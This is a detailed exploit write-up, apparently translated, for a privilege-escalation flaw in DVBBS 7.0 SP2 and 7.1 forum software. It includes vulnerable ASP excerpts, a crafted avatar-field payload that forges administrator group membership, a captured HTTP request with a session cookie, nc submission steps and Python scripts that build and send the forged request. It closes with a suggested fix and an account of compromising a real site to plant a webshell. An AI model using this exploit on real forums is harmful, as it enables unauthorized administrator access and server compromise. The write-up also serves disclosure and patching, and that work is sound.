In a June article, "Discovering the vulnerabilities of DVBBS 7.1", I read that the admin_postings.asp file has an injection vulnerability, but only for a caller who already has super moderator or front-end administrator privileges. I recalled that DVBBS 7.x has a previously discovered front-end privilege escalation vulnerability that can be chained with it. This escalation works on both the Access and the SQL editions of 7.x. Below I explain how to exploit it on 7.0 SP2 SQL.
Vulnerability Analysis:
DVBBS uses GroupID to determine which user group the current user belongs to, and then uses the group's settings to decide the user's permissions. Where does this GroupID come from? Look at the login check, around line 525 of login.asp:
Rem ========= Forum login function ==========
Rem Check the user's login
Function ChkUserLogin(username, password, mobile, userCookies, ctype)
    ' ... preceding code omitted ...
    SQL = "Select UserID, UserName, UserPassword, UserEmail, UserPost, UserTopic, UserSex, UserFace, UserWidth, UserHeight, JoinDate, LastLogin, UserLogins, Lockuser, Userclass, UserGroupID, UserGroup, UserWealth, userEP, userCP, UserPower, UserBirthday, UserLastIP, UserDel, UserIsBest, UserHidden, UserMsg, IsChallenge, UserMobile, TitlePic, UserTitle, TruePassWord, UserToday "
    SQL = SQL + "From [Dv_User] Where " & SQLstr & ""
    Set rsUser = DVBBS.Execute(SQL)
    If rsUser.eof and rsUser.bof Then
        ChkUserLogin = false
        Exit Function
    Else
        ' All 33 columns of the row joined into one string, "|" as the column delimiter
        iMyUserInfo = rsUser.GetString(, 1, "|", "", "")
        rsUser.Close: Set rsUser = Nothing
    End If
    ' Four leading elements ("DVBBS", Now, Now, BoardID) and a trailing "DVBBS" are added
    iMyUserInfo = "DVBBS|" & Now & "|" & Now & "|" & DVBBS.BoardID & "|" & iMyUserInfo & "|DVBBS"
    ' Split back into an array: element 0 is "DVBBS", element 4 is UserID, element 19 is UserGroupID
    iMyUserInfo = Split(iMyUserInfo, "|")
    If trim(password) <> trim(iMyUserInfo(6)) Then    ' UserPassword
        ChkUserLogin = false
    ElseIf iMyUserInfo(17) = 1 Then                   ' Lockuser: locked account
        ChkUserLogin = false
    ElseIf iMyUserInfo(19) = 5 Then                   ' UserGroupID 5 may not log in
        ChkUserLogin = false
    Else
        ChkUserLogin = True
        Session(DVBBS.CacheName & "UserID") = iMyUserInfo
        DVBBS.UserID = iMyUserInfo(4)
        RegName = iMyUserInfo(5)
        Article = iMyUserInfo(8)
        UserLastLogin = iMyUserInfo(15)
        UserClass = iMyUserInfo(18)
        GroupID = iMyUserInfo(19)                     ' read purely by position
        TitlePic = iMyUserInfo(34)
        If Article < 0 Then Article = 0
    End If
    ' ... following code omitted ...
As you can see, DVBBS joins the user's columns into one string with "|" as the delimiter, stores it in iMyUserInfo, and then splits that string on "|" into an array. After the password check passes, iMyUserInfo(19), the 20th element (zero-based index 19), is assigned to GroupID. In other words, GroupID is simply whatever lands at index 19 of the array. If iMyUserInfo(19) is 1, the logged-in user is a front-end administrator.
Dv_ClsMain.asp in the inc directory contains a second identity check, used to re-read the user's permissions after the user updates their profile. Around line 650 of Dv_ClsMain.asp:
Public Sub TrueCheckUserLogin()
    ' ... omitted ...
    Dim Rs, SQL
    SQL = "Select UserID, UserName, UserPassword, UserEmail, UserPost, UserTopic, UserSex, UserFace, UserWidth, UserHeight, JoinDate, LastLogin, UserLogins, Lockuser, Userclass, UserGroupID, UserGroup, userWealth, userEP, userCP, UserPower, UserBirthday, UserLastIP, UserDel, UserIsBest, UserHidden, UserMsg, IsChallenge, UserMobile, TitlePic, UserTitle, TruePassWord, UserToday "
    SQL = SQL + "From [Dv_User] Where UserID=" & UserID
    Set Rs = Execute(SQL)
    If Rs.Eof And Rs.Bof Then
        Rs.Close: Set Rs = Nothing
        UserID = 0
        EmptyCookies
        LetGuestSession()
    Else
        ' Same "|"-joined record as in login.asp
        MyUserInfo = Rs.GetString(, 1, "|", "", "")
        Rs.Close: Set Rs = Nothing
        If IsArray(Session(CacheName & "UserID")) Then
            MyUserInfo = "DVBBS|" & Now & "|" & Session(CacheName & "UserID")(2) & "|" & BoardID & "|" & MyUserInfo & "|DVBBS"
        Else
            MyUserInfo = "DVBBS|" & Now & "|" & DateAdd("s", -3600, Now()) & "|" & BoardID & "|" & MyUserInfo & "|DVBBS"
        End If
        Response.Write MyUserInfo
        MyUserInfo = Split(MyUserInfo, "|")
        ' ...
    End If
End Sub
After a successful login, this function reads the user group and other common user information back out of the cached array:
Public Sub GetCacheUserInfo()
    MyUserInfo = Session(CacheName & "UserID")
    UserID = Clng(MyUserInfo(4))
    MemberName = MyUserInfo(5)
    Lastlogin = MyUserInfo(15)
    If Not IsDate(LastLogin) Then LastLogin = Now()
    UserGroupID = Cint(MyUserInfo(19))    ' group id taken from index 19, by position only
    ' ... following code omitted ...
Both checks build the array the same way, so either of them can be used to reach our goal. Look at the SQL statement:
SQL = "Select UserID, UserName, UserPassword, UserEmail, UserPost, UserTopic, UserSex, UserFace, UserWidth, UserHeight, JoinDate, LastLogin, UserLogins, Lockuser, Userclass, UserGroupID, UserGroup, userWealth, userEP, userCP, UserPower, UserBirthday, UserLastIP, UserDel, UserIsBest, UserHidden, UserMsg, IsChallenge, UserMobile, TitlePic, UserTitle, TruePassWord, UserToday "
SQL = SQL + "From [Dv_User] Where UserID=" & UserID
UserGroupID is the 16th column of the SELECT, which puts it at index 19 of the array once the four leading elements are counted. If any column before it contains a "|", every later element shifts, and UserGroupID is read from a different position of MyUserInfo. The column we inject into has some requirements: it must be a text type, not numeric; it must be long enough to hold the array fragment we construct; and it must precede UserGroupID in the SELECT, so that our injected delimiters move where UserGroupID is found in the original array (see figure 1).
Only UserEmail and UserFace qualify. UserEmail is checked by the IsValidEmail function, so a "|" cannot be inserted there; that leaves UserFace.
When basic profile information is modified, DVBBS filters only the characters used for SQL injection and does not strip "|". So by constructing the right string we can fool DVBBS into treating us as a member of the administrator group. The filter in mymodify.asp:
Face = Dv_FilterJS(Replace(face, "'", ""))    ' strips single quotes
Face = Replace(face, "..", "")
Face = Replace(face, "\", "/")
Face = Replace(face, "^", "")
Face = Replace(face, "#", "")
Face = Replace(face, "%", "")                 ' no filtering of "|"
Vulnerability exploitation:
How should the UserFace value be constructed? At first I thought it was enough for iMyUserInfo(19) to become 1, but that never worked. The reason is that injecting delimiters changes the structure of the whole iMyUserInfo array: the part of the new array from UserFace onward must have the same layout as the original array, otherwise a type conversion error occurs on a later field. UserBirthday, for example, must still hold a date in the new array. The simplest approach is to take the second half of a normal iMyUserInfo, from the UserFace element to the end, use it as our UserFace value, and set the element at the UserGroupID position to 1. I modified login.asp so that it prints the current user's iMyUserInfo at login, as shown in figure 2.
For example, at login iMyUserInfo is:
DVBBS|2005-6-19 18:05:34|2005-6-19 18:05:34|0|1|admin|469e80d32c0559f8|Eway@aspsky.net|4|1|0|images/userface/image1.gif|32|32|2003-12-30 16:34:00|2005-6-19 18:04:06|25|0|administrator|1|120|115|28|0||210.41.235.200|0|0|0|0|level10.gif|9pc722664t5w7IM7|0|0|0|DVBBS
We can use the following as the UserFace value:
images/userface/image1.gif|32|32|2003-12-30 16:34:00|2005-6-19 18:04:06|25|0|administrator|1||120|115|28|0|210.41.235.200|0|0|0|0||0|level10.gif|9pc722664t5w7IM7|0|0|0|DVBBS
The UserFace column holds at most 255 characters, so the value must not exceed that. The profile form limits the field to 100 characters on the client side, so we submit the request by hand with nc (netcat) instead of through the browser.
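The following is an added example in Python, not DVBBS code: it simulates how login.asp and Dv_ClsMain.asp build the "|"-joined user record with rsUser.GetString and read it back with Split, and shows why a "|" inside UserFace moves the element that GroupID is taken from. The column order is the SELECT shown above; every row value (names, hashes, IP, the ordinary user's group id 7) is constructed sample data. The last two functions are the checks DVBBS does not perform: a count of the split elements, and rejecting the delimiter on input as the postscript recommends.

```python
# Added example in Python (not DVBBS code): simulates the "|"-joined user
# record that login.asp and Dv_ClsMain.asp build with rsUser.GetString(,1,"|")
# and read back with Split(), to show why a "|" inside UserFace moves the
# element that GroupID is read from. Column order is the SELECT from the page;
# every row value below is constructed sample data, not a real account.

# The 33 columns of the SELECT, in order.
COLUMNS = [
    "UserID", "UserName", "UserPassword", "UserEmail", "UserPost", "UserTopic",
    "UserSex", "UserFace", "UserWidth", "UserHeight", "JoinDate", "LastLogin",
    "UserLogins", "Lockuser", "Userclass", "UserGroupID", "UserGroup",
    "userWealth", "userEP", "userCP", "UserPower", "UserBirthday", "UserLastIP",
    "UserDel", "UserIsBest", "UserHidden", "UserMsg", "IsChallenge", "UserMobile",
    "TitlePic", "UserTitle", "TruePassWord", "UserToday",
]
PREFIX = 4                                          # "DVBBS", Now, Now, BoardID
RECORD_LEN = PREFIX + len(COLUMNS) + 1              # + trailing "DVBBS" = 38 elements
FACE_IDX = PREFIX + COLUMNS.index("UserFace")       # 11
LOCK_IDX = PREFIX + COLUMNS.index("Lockuser")       # 17
GROUP_IDX = PREFIX + COLUMNS.index("UserGroupID")   # 19
FACE_MAX = 255                                      # size of the UserFace column


def build_record(row, board_id=0, now="2005-6-19 18:05:34"):
    """GetString(,1,"|","","") plus the "DVBBS|Now|Now|BoardID|...|DVBBS" wrapper."""
    joined = "|".join(str(row[c]) for c in COLUMNS)
    return "DVBBS|%s|%s|%s|%s|DVBBS" % (now, now, board_id, joined)


def login_group_id(record):
    """What ChkUserLogin / GetCacheUserInfo do: Split on "|", test Lockuser at
    index 17, then take Cint(MyUserInfo(19)) as the group id, purely by position."""
    parts = record.split("|")
    if int(parts[LOCK_IDX]) == 1:
        return None                                 # locked account, login refused
    return int(parts[GROUP_IDX])


def forge_face(template_record, group_id=1):
    """Build a UserFace value the way the article describes: the tail of a
    well-formed record from UserFace to the closing "DVBBS", with the element at
    the UserGroupID position set to group_id (1 = front-end administrator).
    Keeping the rest of the tail intact keeps later positional reads
    (UserBirthday must be a date, etc.) type-correct."""
    tail = template_record.split("|")[FACE_IDX:]
    tail[GROUP_IDX - FACE_IDX] = str(group_id)
    tail[LOCK_IDX - FACE_IDX] = "0"
    face = "|".join(tail)
    if len(face) > FACE_MAX:
        raise ValueError("forged UserFace exceeds the %d-char column" % FACE_MAX)
    return face


def record_is_well_formed(record):
    """Server-side check DVBBS lacks: a genuine record splits into exactly 38
    elements bracketed by the two "DVBBS" markers; any injected delimiter
    breaks the count."""
    parts = record.split("|")
    return len(parts) == RECORD_LEN and parts[0] == parts[-1] == "DVBBS"


def reject_delimiter(value):
    """Input-side fix from the postscript: refuse the delimiter in any profile
    field that ends up inside the joined record."""
    if "|" in value:
        raise ValueError("record delimiter not allowed in profile field")
    return value


def sample_row(user_id, name, group_id, user_class):
    """Constructed sample row with placeholder values (not real data)."""
    row = dict.fromkeys(COLUMNS, "0")
    row.update({
        "UserID": user_id, "UserName": name, "UserPassword": "0123456789abcdef",
        "UserEmail": name + "@example.com", "UserFace": "images/userface/image1.gif",
        "UserWidth": 32, "UserHeight": 32, "JoinDate": "2003-12-30 16:34:00",
        "LastLogin": "2005-6-19 18:04:06", "UserLogins": 25, "Userclass": user_class,
        "UserGroupID": group_id, "UserGroup": user_class, "UserBirthday": "1980-1-1",
        "UserLastIP": "192.0.2.10", "TitlePic": "level10.gif",
        "TruePassWord": "ffffffffffffffff",
    })
    return row


def demo():
    """An ordinary user (constructed group id 7) whose UserFace is replaced by a
    tail copied from an administrator record. Returns (group before, group
    after, whether the forged record still passes the element-count check)."""
    admin = build_record(sample_row(1, "admin", 1, "administrator"))
    victim = sample_row(4, "test", 7, "new user")
    before = login_group_id(build_record(victim))
    victim["UserFace"] = forge_face(admin)          # what mymodify.asp stores unfiltered
    forged = build_record(victim)
    return before, login_group_id(forged), record_is_well_formed(forged)


if __name__ == "__main__":
    print(demo())                                   # (7, 1, False)
```

Running demo() gives (7, 1, False): the same account reads as group 7 before and group 1 after, and the forged record splits into 64 elements instead of 38, which is why an element-count check catches it even without filtering the input.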
First test on a local machine: log in to the forum as an ordinary user. At this point the user's level is still "new user".
Now modify the basic profile information.
Submit the form and capture the request with WSE.
The captured request is:
POST /bs/mymodify.asp?Action=updat&username=4 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://210.41.235.199/bs/mymodify.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)
Host: 210.41.235.199
Content-Length: 396
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 210%2E41%2E235%2E199%2Fbs%2F=userCookies=0&StatUserID=21048347059&password=fVIy4l887ZvD956c&userhidden=&username=test&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&userid=4; upNum=0; ASPSESSIONIDASCDABTA=IEGHDLKCCHDMOBPFPFFHMNAM

California&width=32&height=32&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&userCookies=0&setuserinfo=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0&shengxiao=&blood=&belief=&occupation=&marfound=&education=&college=&Submit=%B8%FC+%D0%C2
Now replace the userface value in the body with:
images/userface/image1.gif|32|32|2003-12-30%2016:34:00|2005-6-19%2018:04:06|25|0|administrator|1|120|115|28|0|210.41.235.200|0|0|0|0||0|level10.gif|9pc722664t5w7IM7|0|0|DVBBS
Note that every space in the value must be replaced with %20, the Content-Length value must be recalculated, and the request is then submitted once with nc. Our user's userface is now replaced. Log in again.
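The hand-editing step above (encode the spaces, recompute Content-Length, pipe the file into nc) is easy to get wrong, so here is an added Python example, not from the article, that builds the raw POST and verifies its Content-Length against the body. The host, path, cookie and field values are constructed placeholders; the form field name "face" is the one reg.asp reads with Request.Form("face") and is assumed to be the same for mymodify.asp, since the start of the captured body on the page is cut off. The crafted face value is the same shape as the one shown above, with placeholder data.

```python
# Added example in Python (not from the article): builds the raw POST that the
# article submits with nc after editing the captured request, URL-encoding the
# crafted face value (spaces become %20, "|" becomes %7C) and recomputing
# Content-Length. Host, path, cookie and all field values are constructed
# placeholders; the field name "face" is taken from reg.asp's
# Request.Form("face") and is assumed to apply to mymodify.asp as well.
import socket
from urllib.parse import urlencode, quote


def build_post(host, path, fields, cookie):
    """Return the complete HTTP/1.1 request as bytes, ready to pipe into nc."""
    body = urlencode(fields, quote_via=quote)        # %20 for spaces, %7C for "|"
    headers = [
        "POST %s HTTP/1.1" % path,
        "Host: %s" % host,
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: %d" % len(body.encode("ascii")),
        "Cookie: %s" % cookie,
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n" + body).encode("ascii")


def content_length_ok(raw):
    """Check a raw request's Content-Length against its actual body length
    (the mistake the article warns about after hand-editing the capture)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return False
    for line in head.split(b"\r\n"):
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            return int(value.strip()) == len(body)
    return False


def send_raw(host, port, raw):
    """Equivalent of `nc host port < request.txt`; not called by default."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(raw)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


# Constructed sample: a crafted face value of the shape the article uses
# (tail of a normal record from UserFace to "DVBBS", group id position = 1).
CRAFTED_FACE = ("images/userface/image1.gif|32|32|2003-12-30 16:34:00|"
                "2005-6-19 18:04:06|25|0|administrator|1|administrator|0|0|0|0|"
                "1980-1-1|192.0.2.10|0|0|0|0|0|0|level10.gif|0|ffffffffffffffff|0|DVBBS")


def example_request():
    """The profile-update POST with the crafted face; placeholder host and cookie."""
    fields = {
        "face": CRAFTED_FACE, "width": "32", "height": "32", "birthday": "",
        "GroupName": "", "setuserinfo": "1", "setusertrue": "0", "Submit": "update",
    }
    return build_post("forum.example", "/bs/mymodify.asp?Action=updat&username=4",
                      fields, "userCookies=0&username=test&userid=4")


if __name__ == "__main__":
    req = example_request()
    print(req.decode("ascii"))
    # send_raw("forum.example", 80, req)   # uncomment to actually submit
```

Because Request.Form decodes the body before mymodify.asp's filter runs, encoding "|" as %7C changes nothing for the 7.0 SP2 filter (which strips a literal "%" only after decoding) while keeping the request free of raw spaces.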
Haha, see it? We are now an administrator. From here a back-end administrator can be added using the vulnerability described in section 6 of "7.1 vulnerabilities".
Exploiting DVBBS 7.1:
In 7.1 the method changes slightly and is harder than on 7.0 SP2, because 7.1 adds a filter that strips the "|" character from the face variable.
Around line 270 of mymodify.asp:
Face = Dv_FilterJS(Replace(face, "'", ""))
Face = Replace(face, "..", "")
Face = Replace(face, "\", "/")
Face = Replace(face, "^", "")
Face = Replace(face, "#", "")
Face = Replace(face, "%", "")
Face = Replace(face, "|", "")                 ' new in 7.1
Unfortunately for DVBBS, its programmers were not thorough: the avatar can also be set at registration, and reg.asp does not filter the face variable at all. Around line 285 of reg.asp:
If Request.Form("face") <> "" Then
    Face = Request.Form("face")               ' stored without any filtering
End If
As before, capture the registration request and resubmit it with nc with the crafted face. After registering and logging in, you are a front-end administrator. There is a further problem, however: TruePassword. 7.1 strengthens its protection against cookie spoofing, so the truepassword changes very frequently. In 7.0 SP2, newpass.asp contains only a single call, which updates the current user's truepassword:
newpass.asp in 7.0 SP2:
<%
DVBBS.NewPassword0()
%>
In 7.1, newpass.asp also checks whether the user's cookie was updated. Around line 30 of newpass.asp in 7.1:
' Check whether the cookie was written successfully; if so, update the database
If DVBBS.checkStr(Trim(Request.Cookies(DVBBS.Forum_sn)("password"))) = TruePassWord Then
    DVBBS.Execute("UpDate [Dv_user] Set TruePassWord='" & TruePassWord & "' where UserID=" & DVBBS.UserID)
    DVBBS.MemberWord = TruePassWord
    Dim iUserInfo
    iUserInfo = Session(DVBBS.CacheName & "UserID")
    iUserInfo(35) = TruePassWord              ' index 35 is TruePassWord in the cached array
    Session(DVBBS.CacheName & "UserID") = iUserInfo
End If
In 7.1, the truepassword in our client-side cookie is updated to a new value. But the server-side truepassword is also read from MyUserInfo, and with our forged record the truepassword value in MyUserInfo never changes, so the check loops endlessly. Our workaround was to lock the cookie with the cookie-locking feature of the Guilin Laobing (桂林老兵) browser and set the truepassword value in the cookie to match the truepassword in MyUserInfo. Then newpass.asp is no longer requested repeatedly and the endless loop is avoided.
I do not have the SQL edition of 7.1 at hand, so the above was tested on the Access edition of 7.1, where it successfully yields front-end administrator.
Postscript:
How to fix it: changing the record structure is too large a change, so we recommend filtering the "|" character from the corresponding variables in both reg.asp and mymodify.asp, for example:
Face = Dv_FilterJS(Replace(face, "'", ""))
Face = Replace(face, "..", "")
Face = Replace(face, "\", "/")
Face = Replace(face, "^", "")
Face = Replace(face, "#", "")
Face = Replace(face, "%", "")
Face = Replace(face, "|", "")                 ' strip the record delimiter
I also want to point out that DVBBS trusts the back-end administrator far too much: many places in the back end do not guard against SQL injection at all, which leaves the door wide open. One site we tested was really nasty. It ran DVBBS; after we obtained back-end administrator privileges, we found that the upload directory had no script execution permission (an uploaded ASP trojan was simply served back as-is), the directory that could execute ASP was not writable, and no other site on the server was injectable. In the end it was an injection in the DVBBS back end that finally got us a small webshell. One small hole was enough.
This escalation vulnerability is not sophisticated, but its consequences are serious: because SQL injection exists on several of the front-end management pages, it is very damaging to DVBBS 7.x SQL. Do not use the methods in this article for destructive purposes; you alone bear the consequences.